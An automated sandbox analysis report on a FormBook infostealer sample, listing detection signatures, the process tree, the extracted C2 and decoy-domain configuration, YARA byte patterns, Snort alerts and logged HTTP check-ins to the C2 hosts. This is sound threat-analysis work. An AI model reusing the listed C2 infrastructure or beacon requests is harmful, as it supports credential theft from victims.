Loading ...

Play interactive tourEdit tour

Analysis Report 2435.bat

Overview

General Information

Sample Name:2435.bat (renamed file extension from bat to exe)
Analysis ID:433173
MD5:862b4c2abad2c07ac13d5e051c18ab86
SHA1:c78f0a59312c7902e445c5a31d4896907e96475c
SHA256:c347c2d7579053d263f6ab6eddca7bd03691ebab93b30b5caba462caa7106beb
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2435.exe (PID: 6304 cmdline: 'C:\Users\user\Desktop\2435.exe' MD5: 862B4C2ABAD2C07AC13D5E051C18AB86)
    • 2435.exe (PID: 6340 cmdline: 'C:\Users\user\Desktop\2435.exe' MD5: 862B4C2ABAD2C07AC13D5E051C18AB86)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 3584 cmdline: /c del 'C:\Users\user\Desktop\2435.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.2435.exe.24d0000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.2435.exe.24d0000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.2435.exe.24d0000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.2.2435.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.2435.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 2435.exeReversingLabs: Detection: 43%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 2435.exeJoe Sandbox ML: detected
          Source: 1.1.2435.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.2435.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.2435.exe.24d0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.control.exe.4d7f834.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 9.2.control.exe.43b090.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2435.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: 2435.exe, 00000000.00000003.228355721.0000000009B60000.00000004.00000001.sdmp, 2435.exe, 00000001.00000002.288517092.0000000000B6F000.00000040.00000001.sdmp, control.exe, 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 2435.exe, control.exe
          Source: Binary string: control.pdbUGP source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_0040263E FindFirstFileA,

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.knighttechinca.com/dxe/
          Source: global trafficHTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1Host: www.northsytyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1Host: www.shitarpa.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1Host: www.houseofsisson.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: global trafficHTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1Host: www.northsytyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1Host: www.shitarpa.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1Host: www.houseofsisson.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.northsytyle.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: control.exe, 00000009.00000002.499880225.000000000526F000.00000004.00000001.sdmpString found in binary or memory: http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDI
          Source: 2435.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 2435.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419D5A NtCreateFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419E0A NtReadFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419E8A NtClose,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00419F3A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk,
